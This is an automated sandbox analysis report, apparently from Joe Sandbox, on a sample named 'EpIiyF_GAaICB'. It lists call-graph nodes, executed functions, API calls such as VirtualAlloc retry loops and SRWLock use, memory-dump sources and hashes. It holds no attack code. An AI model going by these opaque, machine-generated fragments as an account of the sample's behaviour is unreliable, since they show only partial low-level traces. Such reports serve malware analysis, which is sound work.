74572 d56100 171 API calls 74572->74576 74573->74555 74574 d5602e VirtualFree 74574->74575 74574->74576 74575->74569 74576->74572 74576->74573 74576->74574 74576->74575 74577 d56121 74576->74577 74578 d56208 74576->74578 74579 d5624c 74576->74579 74580 d562cc VirtualFree 74576->74580 74582 d55ba0 30 API calls 74576->74582 74590 d560a4 GetLastError 74576->74590 74662 d55ba0 VirtualAlloc 74577->74662 74581 d55ba0 30 API calls 74578->74581 74584 d55ba0 30 API calls 74579->74584 74583 d562ed 74580->74583 74586 d5622b 74581->74586 74582->74576 74583->74555 74584->74583 74588 d5615d 74586->74588 74589 d56238 GetLastError 74586->74589 74588->74555 74589->74588 74590->74576 74591 d56168 GetLastError 74591->74588 74592 d5618a TryAcquireSRWLockExclusive 74591->74592 74593 d561a3 74592->74593 74594 d56199 74592->74594 74596 d561e6 ReleaseSRWLockExclusive 74593->74596 74597 d561af VirtualFree 74593->74597 74695 d3c4b0 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 74594->74695 74596->74579 74598 d561f9 74596->74598 74597->74579 74599 d561cb 74597->74599 74598->74578 74598->74579 74598->74580 74602 d5655a 74598->74602 74599->74596 74600 cffc01 8 API calls 74600->74602 74602->74600 74603 d5668b 74602->74603 74604 d566ad 74602->74604 74611 d3ea2c 8 API calls 74602->74611 74696 cff8c8 181 API calls __dosmaperr 74602->74696 74697 d0046c 5 API calls _ValidateLocalCookies 74602->74697 74698 d61fe6 5 API calls ___raise_securityfailure 74603->74698 74699 cffd4e 8 API calls 74604->74699 74607 d566a1 74607->74555 74609 d56727 74700 d56758 181 API calls 74609->74700 74611->74602 74612 d5672f 74701 cffda8 8 API calls 74612->74701 74614 d5673a 74702 d61fe6 5 API calls ___raise_securityfailure 74614->74702 74616 d5674c 74616->74555 74703 d615a0 TryAcquireSRWLockExclusive 74617->74703 74619 d5f789 74620 d5f795 74619->74620 74621 d5f79b GetCurrentProcess IsWow64Process 74619->74621 74620->74560 74622 d5f7b1 74621->74622 74622->74620 74624 d56115 74623->74624 74626 d56249 74623->74626 74625 d56208 74624->74625 74624->74626 74627 d562cc VirtualFree 74624->74627 74631 d55ba0 30 API calls 74624->74631 74628 d55ba0 30 API calls 74625->74628 74630 d55ba0 30 API calls 74626->74630 74629 d562ed 74627->74629 74632 d5622b 74628->74632 74629->74564 74630->74629 74633 d56156 74631->74633 74634 d5615d 74632->74634 74635 d56238 GetLastError 74632->74635 74633->74634 74636 d56168 GetLastError 74633->74636 74634->74564 74635->74634 74636->74634 74637 d5618a TryAcquireSRWLockExclusive 74636->74637 74638 d561a3 74637->74638 74639 d56199 74637->74639 74641 d561e6 ReleaseSRWLockExclusive 74638->74641 74642 d561af VirtualFree 74638->74642 74724 d3c4b0 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 74639->74724 74641->74626 74643 d561f9 74641->74643 74642->74626 74644 d561cb 74642->74644 74643->74625 74643->74626 74643->74627 74647 d5655a 74643->74647 74644->74641 74645 cffc01 8 API calls 74645->74647 74647->74645 74648 d5668b 74647->74648 74649 d566ad 74647->74649 74656 d3ea2c 8 API calls 74647->74656 74725 cff8c8 181 API calls __dosmaperr 74647->74725 74726 d0046c 5 API calls _ValidateLocalCookies 74647->74726 74727 d61fe6 5 API calls ___raise_securityfailure 74648->74727 74728 cffd4e 8 API calls 74649->74728 74652 d566a1 74652->74564 74654 d56727 74729 d56758 181 API calls 74654->74729 74656->74647 74657 d5672f 74730 cffda8 8 API calls 74657->74730 74659 d5673a 74731 d61fe6 5 API calls ___raise_securityfailure 74659->74731 74661 d5674c 74661->74564 74663 d55e02 74662->74663 74664 d55bca 74662->74664 74663->74588 74663->74591 74664->74663 74665 d55be8 GetLastError 74664->74665 74666 d55c04 Sleep VirtualAlloc 74665->74666 74667 d55bf9 74665->74667 74666->74663 74668 d55c22 GetLastError 74666->74668 74667->74663 74667->74666 74669 d55c33 74668->74669 74670 d55c3e Sleep VirtualAlloc 74668->74670 74669->74663 74669->74670 74670->74663 74671 d55c5c GetLastError 74670->74671 74672 d55c6d 74671->74672 74673 d55c78 Sleep VirtualAlloc 74671->74673 74672->74663 74672->74673 74673->74663 74674 d55c96 GetLastError 74673->74674 74675 d55ca7 74674->74675 74676 d55cb2 Sleep VirtualAlloc 74674->74676 74675->74663 74675->74676 74676->74663 74677 d55cd0 GetLastError 74676->74677 74678 d55ce1 74677->74678 74679 d55cec Sleep VirtualAlloc 74677->74679 74678->74663 74678->74679 74679->74663 74680 d55d0a GetLastError 74679->74680 74681 d55d26 Sleep VirtualAlloc 74680->74681 74682 d55d1b 74680->74682 74681->74663 74683 d55d44 GetLastError 74681->74683 74682->74663 74682->74681 74684 d55d55 74683->74684 74685 d55d60 Sleep VirtualAlloc 74683->74685 74684->74663 74684->74685 74685->74663 74686 d55d7e GetLastError 74685->74686 74687 d55d96 Sleep VirtualAlloc 74686->74687 74688 d55d8f 74686->74688 74687->74663 74689 d55db0 GetLastError 74687->74689 74688->74663 74688->74687 74690 d55dc1 74689->74690 74691 d55dc8 Sleep VirtualAlloc 74689->74691 74690->74663 74690->74691 74691->74663 74692 d55de2 GetLastError 74691->74692 74693 d55df3 74692->74693 74694 d55dfa Sleep 74692->74694 74693->74663 74693->74694 74694->74663 74695->74593 74697->74602 74698->74607 74699->74609 74700->74612 74701->74614 74702->74616 74704 d615b3 74703->74704 74705 d615d8 74703->74705 74708 d615bc 74704->74708 74710 d61640 74704->74710 74717 d3c4b0 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 74705->74717 74709 d615c6 ReleaseSRWLockExclusive 74708->74709 74709->74619 74718 d61730 74710->74718 74713 d61730 2 API calls 74714 d6169a 74713->74714 74723 d61fe6 5 API calls ___raise_securityfailure 74714->74723 74716 d616b2 74716->74708 74717->74704 74719 d61746 LoadLibraryExW 74718->74719 74720 d61740 74718->74720 74721 d61761 SystemFunction036 74719->74721 74722 d61677 74719->74722 74720->74721 74720->74722 74721->74722 74722->74713 74723->74716 74724->74638 74726->74647 74727->74652 74728->74654 74729->74657 74730->74659 74731->74661 74733 d54c83 74732->74733 74754 d559f0 74733->74754 74735 d54d12 74735->74524 74736 d54d0a 74736->74735 74760 d55a40 6 API calls 74736->74760 74739 d54de9 74744 d55a20 181 API calls 74739->74744 74740 d54d5b 74740->74735 74740->74736 74740->74739 74741 d54c8d 74741->74736 74743 d54ccb 74741->74743 74745 d559f0 181 API calls 74741->74745 74757 d55a20 74741->74757 74742 d55a20 181 API calls 74742->74743 74743->74735 74743->74740 74743->74742 74746 d559f0 181 API calls 74743->74746 74744->74735 74745->74741 74746->74743 74747->74506 74748->74507 74749->74517 74750->74520 74751->74520 74755 d560e0 181 API calls 74754->74755 74756 d55a0a 74755->74756 74756->74741 74761 d55e10 VirtualFree 74757->74761 74759 d55a2e 74759->74741 74760->74735 74762 d55e27 74761->74762 74763 d55e33 74761->74763 74762->74759 74764 d56121 74763->74764 74765 d56208 74763->74765 74766 d55e9f VirtualFree 74763->74766 74767 d55ba0 30 API calls 74763->74767 74790 d55ebd 74763->74790 74772 d55ba0 30 API calls 74764->74772 74768 d55ba0 30 API calls 74765->74768 74770 d55eb0 GetLastError 74766->74770 74771 d55eba 74766->74771 74773 d55e7e 74767->74773 74774 d5622b 74768->74774 74769 d55ba0 30 API calls 74769->74790 74770->74771 74770->74790 74771->74759 74775 d56156 74772->74775 74773->74771 74777 d55e85 GetLastError 74773->74777 74778 d5615d 74774->74778 74779 d56238 GetLastError 74774->74779 74775->74778 74782 d56168 GetLastError 74775->74782 74776 d56100 169 API calls 74776->74790 74783 d55e92 74777->74783 74784 d55e98 74777->74784 74778->74759 74779->74778 74780 d560a4 GetLastError 74780->74790 74781 d560bc 74781->74759 74782->74778 74785 d5618a TryAcquireSRWLockExclusive 74782->74785 74820 d45050 15 API calls 74783->74820 74784->74766 74784->74771 74787 d561a3 74785->74787 74788 d56199 74785->74788 74792 d561e6 ReleaseSRWLockExclusive 74787->74792 74793 d561af VirtualFree 74787->74793 74821 d3c4b0 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 74788->74821 74789 d5602e VirtualFree 74789->74790 74799 d560d2 74789->74799 74790->74764 74790->74765 74790->74769 74790->74776 74790->74780 74790->74781 74790->74789 74796 d5624c 74790->74796 74797 d562cc VirtualFree 74790->74797 74790->74799 74794 d561f9 74792->74794 74792->74796 74795 d561cb 74793->74795 74793->74796 74794->74765 74794->74796 74794->74797 74815 d5655a 74794->74815 74795->74792 74798 d55ba0 30 API calls 74796->74798 74802 d562ed 74797->74802 74798->74802 74804 d55ed0 169 API calls 74799->74804 74801 d3ea2c 8 API calls 74801->74815 74802->74759 74803 d566ad 74825 cffd4e 8 API calls 74803->74825 74805 d560f9 74804->74805 74805->74759 74806 d5668b 74824 d61fe6 5 API calls ___raise_securityfailure 74806->74824 74807 cffc01 8 API calls 74807->74815 74810 d566a1 74810->74759 74812 d56727 74826 d56758 181 API calls 74812->74826 74814 d5672f 74827 cffda8 8 API calls 74814->74827 74815->74801 74815->74803 74815->74806 74815->74807 74822 cff8c8 181 API calls __dosmaperr 74815->74822 74823 d0046c 5 API calls _ValidateLocalCookies 74815->74823 74817 d5673a 74828 d61fe6 5 API calls ___raise_securityfailure 74817->74828 74819 d5674c 74819->74759 74821->74787 74823->74815 74824->74810 74825->74812 74826->74814 74827->74817 74828->74819 74829 551d01c 74830 551d030 74829->74830 74831 551d070 74830->74831 74834 5690c50 74830->74834 74839 5690c40 74830->74839 74835 5690c55 74834->74835 74836 5690db3 74835->74836 74844 70f9c48 74835->74844 74848 70f9c37 74835->74848 74836->74831 74840 5690c55 74839->74840 74841 5690db3 74840->74841 74842 70f9c48 KiUserCallbackDispatcher 74840->74842 74843 70f9c37 KiUserCallbackDispatcher 74840->74843 74841->74831 74842->74841 74843->74841 74845 70f9c57 74844->74845 74852 70f8ccc 74845->74852 74849 70f9c48 74848->74849 74850 70f8ccc KiUserCallbackDispatcher 74849->74850 74851 70f9c78 74850->74851 74851->74836 74853 70f8cd7 74852->74853 74856 70f9f54 74853->74856 74855 70fa97d 74855->74855 74857 70f9f5f 74856->74857 74858 70fb1ec 74857->74858 74860 70fce80 74857->74860 74858->74855 74861 70fcea1 74860->74861 74862 70fcec5 74861->74862 74865 70fd030 74861->74865 74869 70fd022 74861->74869 74862->74858 74866 70fd03d 74865->74866 74868 70fd076 74866->74868 74873 70fbdac 74866->74873 74868->74862 74870 70fd03d 74869->74870 74871 70fd076 74870->74871 74872 70fbdac KiUserCallbackDispatcher 74870->74872 74871->74862 74872->74871 74874 70fbdb7 74873->74874 74875 70fd0e8 74874->74875 74877 70fbde0 74874->74877 74878 70fbdeb 74877->74878 74881 70fbdf0 74878->74881 74880 70fd157 74880->74875 74882 70fbdfb 74881->74882 74887 70fda50 74882->74887 74884 70fe181 74884->74880 74885 70fce80 KiUserCallbackDispatcher 74885->74884 74886 70fdf59 74886->74884 74886->74885 74888 70fda5b 74887->74888 74889 70fe2ea 74888->74889 74890 70fe338 KiUserCallbackDispatcher 74888->74890 74889->74886 74890->74889

                                                  Executed Functions

                                                  Function 070F0040 Relevance: 16.1, Strings: 12, Instructions: 1127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447776421.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_70f0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3443518476
                                                  • Opcode ID: 923a7701ffb444c8a493d0e82dd72a5a57fb236f97cd99efc4f58b1360c743be
                                                  • Instruction ID: db9b2ed5c9057034c1987833d1d047671369b40ebb10148f06e7c97af1ec6d84
                                                  • Opcode Fuzzy Hash: 923a7701ffb444c8a493d0e82dd72a5a57fb236f97cd99efc4f58b1360c743be
                                                  • Instruction Fuzzy Hash: 9BB2EAB4A001199FDB68DF54C894BAEBBF6FF88300F1581A9D909A7751DB349D82CF50
                                                  Function 00D49290 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 396COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 357 d49290-d492ae 358 d492b4-d492bd 357->358 359 d494df-d494e0 357->359 360 d494e7 call d4aff0 358->360 361 d492c3-d492d0 358->361 359->360 368 d494ec 360->368 362 d497f4-d497f5 361->362 363 d492d6-d492ea 361->363 365 d497f7-d497fb 362->365 366 d492f2-d49321 363->366 367 d492ec-d492ef 363->367 369 d49809-d4980f ReleaseSRWLockExclusive 365->369 370 d49323-d49337 366->370 371 d49339-d49349 366->371 367->366 374 d494f1-d494fa call d3e970 368->374 377 d49816-d49819 369->377 370->371 372 d49456-d4946f TryAcquireSRWLockExclusive 371->372 373 d4934f-d49369 371->373 375 d49471-d49473 call d3c4b0 372->375 376 d49478-d49482 372->376 378 d49374-d4938c 373->378 379 d4936b-d49370 call d61a84 373->379 394 d49501-d4950d 374->394 375->376 383 d496d2-d496e5 call d53fc0 376->383 384 d49488-d494a9 376->384 385 d497a2-d497a8 377->385 378->374 387 d49392-d49399 378->387 379->378 398 d496ea-d496f0 383->398 388 d49620 384->388 389 d494af-d494c3 384->389 395 d497b0-d497c3 385->395 387->372 392 d4939f-d493ae 387->392 397 d49622-d4966e ReleaseSRWLockExclusive 388->397 389->395 396 d494c9-d494d1 389->396 393 d493b4-d493ba 392->393 392->394 400 d495a5-d495cb call d3bed0 393->400 401 d493c0-d493c4 393->401 402 d49511-d4952d TryAcquireSRWLockExclusive 394->402 404 d497d8-d497ef call d33e20 call cea680 call d3c280 395->404 396->395 403 d494d7-d494da 396->403 410 d49677 397->410 398->365 399 d496f6-d4972a 398->399 405 d49730-d49733 399->405 406 d497fd-d49800 399->406 407 d493c8-d493d1 400->407 428 d495d1 400->428 401->407 408 d49536-d49548 402->408 409 d4952f-d49531 call d3c4b0 402->409 403->397 404->362 413 d49736-d4973c 405->413 406->413 414 d493d3-d493dd 407->414 415 d493e8 407->415 417 d49744-d49760 call d53fc0 408->417 418 d4954e-d4956f 408->418 409->408 419 d49679-d496c9 ReleaseSRWLockExclusive 410->419 413->417 423 d495f3-d4961b call d33e20 call cea680 call d3c280 414->423 424 d493e3-d493e6 414->424 426 d493ea-d49414 415->426 438 d49805 417->438 439 d49766-d4979a 417->439 418->410 427 d49575-d49589 418->427 419->383 423->388 424->426 432 d49426-d4942a 426->432 433 d49416-d49423 call d65500 426->433 434 d497c5-d497d7 427->434 435 d4958f-d49597 427->435 428->402 442 d49441-d49455 call d61fe6 432->442 443 d4942c-d49432 432->443 433->432 434->404 435->434 441 d4959d-d495a0 435->441 438->369 439->377 445 d4979c-d4979f 439->445 441->419 447 d495d6-d495e8 443->447 448 d49438-d4943b 443->448 445->385 447->423 448->442
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D49467
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D49666
                                                    • Part of subcall function 00D3C4B0: TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,00000000,3BE85000,0000000A,DAFC8968,00D3F4F3,00D615E2), ref: 00D3C4CC
                                                    • Part of subcall function 00D3C4B0: AcquireSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D3C4FD
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 00D49809
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: first
                                                  • API String ID: 1678258262-2456940119
                                                  • Opcode ID: 5cd5a2550d5e9a368e79c68a25de5f5222c445805dd98967c0bf3ea61490fa62
                                                  • Instruction ID: 9e26967dd81c438b899166f0b08cb0374edcbc7edfcfe6ca26e68f0b0ce29b36
                                                  • Opcode Fuzzy Hash: 5cd5a2550d5e9a368e79c68a25de5f5222c445805dd98967c0bf3ea61490fa62
                                                  • Instruction Fuzzy Hash: 01F12332A043408FC718CF29C894B6AB7E1FF88314F19856DE8899B396D774EC45CBA1
                                                  Function 00D53FC0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 572COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 590 d53fc0-d53fec 591 d53ff2-d53ff8 590->591 592 d5409d-d540a4 590->592 593 d540de-d540e5 591->593 594 d53ffe-d54007 call d54b50 591->594 595 d54086-d5409a call d61fe6 592->595 596 d540a6-d540b7 call d54790 592->596 593->595 600 d540e7-d54126 593->600 609 d540c7-d540cc 594->609 610 d5400d-d5400f 594->610 611 d540bc-d540c2 596->611 612 d540b9 596->612 601 d5441c-d54497 call d33e20 call cea680 call d33e20 call cea680 call d54c70 600->601 602 d5412c-d54168 600->602 669 d54641-d54646 601->669 670 d5449d-d544aa 601->670 606 d54175-d541e4 call cebd60 602->606 607 d5416a-d54173 602->607 626 d541e6-d54202 606->626 627 d5421f-d54239 606->627 607->606 607->607 616 d540d2-d540d8 609->616 617 d5466f-d54678 609->617 615 d54011-d54013 610->615 611->615 612->611 620 d5476c-d54773 615->620 621 d54019-d54024 615->621 616->593 624 d54667-d54669 616->624 622 d54688-d546ef 617->622 623 d5467a-d54686 617->623 620->595 629 d54779-d5478f ReleaseSRWLockExclusive call d3c890 620->629 630 d54026 621->630 631 d54029-d54031 621->631 625 d546f3-d546f5 622->625 623->624 624->617 632 d546fa-d546ff 624->632 625->621 635 d54204-d54216 626->635 636 d54661-d54662 627->636 637 d5423f-d5424b 627->637 630->631 639 d54037-d5403b 631->639 640 d54250-d5430b 631->640 632->620 633 d54701-d54709 632->633 633->595 641 d5470f-d5476a 633->641 635->635 642 d54218-d5421c 635->642 646 d54664-d54665 636->646 637->615 647 d54065 639->647 648 d5403d-d5404d 639->648 645 d54311-d54329 640->645 641->625 642->627 645->645 651 d5432b-d54342 call d562a0 645->651 646->624 649 d54067-d54080 647->649 652 d54053-d5405a 648->652 653 d5439e-d543c6 call d33e20 call cea680 call d3c280 648->653 649->595 663 d543ff-d54417 call d3c820 call d56290 651->663 664 d54348-d5436d 651->664 652->653 654 d54060-d54063 652->654 673 d543cb-d543cd 653->673 654->649 663->664 665 d54380-d5438f 664->665 666 d5436f-d5437e 664->666 672 d54391-d54399 665->672 665->673 666->665 666->666 674 d54603-d5460f 669->674 675 d54648-d5465c ReleaseSRWLockExclusive call d54e10 669->675 677 d544b0-d544b4 670->677 678 d545f9-d54601 670->678 672->595 682 d543e8-d543f5 673->682 681 d54617-d54636 674->681 675->636 680 d544b8-d5450b 677->680 678->674 678->681 684 d54511-d54523 680->684 681->646 686 d54638 681->686 687 d543f7-d543fd 682->687 688 d543cf-d543d3 682->688 684->684 689 d54525-d5453c call d56290 684->689 686->669 690 d543d5-d543e6 687->690 688->690 692 d54541-d54548 689->692 690->672 690->682 693 d5458b-d545b4 692->693 694 d5454a-d54553 692->694 696 d545b6 693->696 697 d545ca-d545cc 693->697 695 d54559-d5456e 694->695 695->695 698 d54570-d54588 call d56290 695->698 699 d545ba-d545c2 696->699 700 d545ce-d545d2 697->700 701 d545ea-d545f7 697->701 698->693 699->680 704 d545c8 699->704 702 d545d5-d545e8 700->702 701->702 702->699 704->678
                                                  APIs
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D5464F
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D54780
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLockRelease
                                                  • String ID: first$slotsize$spansize
                                                  • API String ID: 1766480654-3908016032
                                                  • Opcode ID: 6172ed680e783fecf794fcf4ce7ef6de9b5abf586920dda9974c1933e4a1d950
                                                  • Instruction ID: 0385e2e659fed6548ef5b4a4edca372c4e4b8464e4f15ae5dd230958e681c1e8
                                                  • Opcode Fuzzy Hash: 6172ed680e783fecf794fcf4ce7ef6de9b5abf586920dda9974c1933e4a1d950
                                                  • Instruction Fuzzy Hash: AE32A1716043019FDB18CF18C881B9AB7E1EF88315F19C56DED898B396D774E885CBA2
                                                  Function 05691B30 Relevance: .2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447221608.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5690000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef4c087c7c1c64f6d6b376b48cf9ffa40748249b2a366e209100c1f416c442a2
                                                  • Instruction ID: dc809c2768c3cbc150fbf7c0bcc710009bde05089e2a3dcf71aab6120aa9dbdf
                                                  • Opcode Fuzzy Hash: ef4c087c7c1c64f6d6b376b48cf9ffa40748249b2a366e209100c1f416c442a2
                                                  • Instruction Fuzzy Hash: 54717A706152429FC715CF28F88674ABFA2FF84314F24856AE4134B366EB7819E9DF81
                                                  Function 05691B40 Relevance: .1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447221608.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5690000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5dddb9f8fe7a969b1c3fdcd3ae439f9ce83ab0f32636f9f5dad88f055e59d090
                                                  • Instruction ID: 76e74fb2277930aa01dc0411a8e4e30bfe9774e14b3f84d6c820ef0907c46863
                                                  • Opcode Fuzzy Hash: 5dddb9f8fe7a969b1c3fdcd3ae439f9ce83ab0f32636f9f5dad88f055e59d090
                                                  • Instruction Fuzzy Hash: C8715A706112429FC715CF29F88674ABFA2FB84314F20856AE4174B362EF7819E9DF81
                                                  Function 00D55BA0 Relevance: 37.7, APIs: 30, Instructions: 171sleepmemoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55BBB
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55BE8
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C06
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55C14
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C22
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C40
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55C4E
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C5C
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C7A
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55C88
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C96
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55CB4
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55CC2
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55CD0
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55CEE
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55CFC
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55D0A
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55D28
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55D36
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55D44
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55D62
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55D70
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55D7E
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55D98
                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55DA6
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55DB0
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55DCA
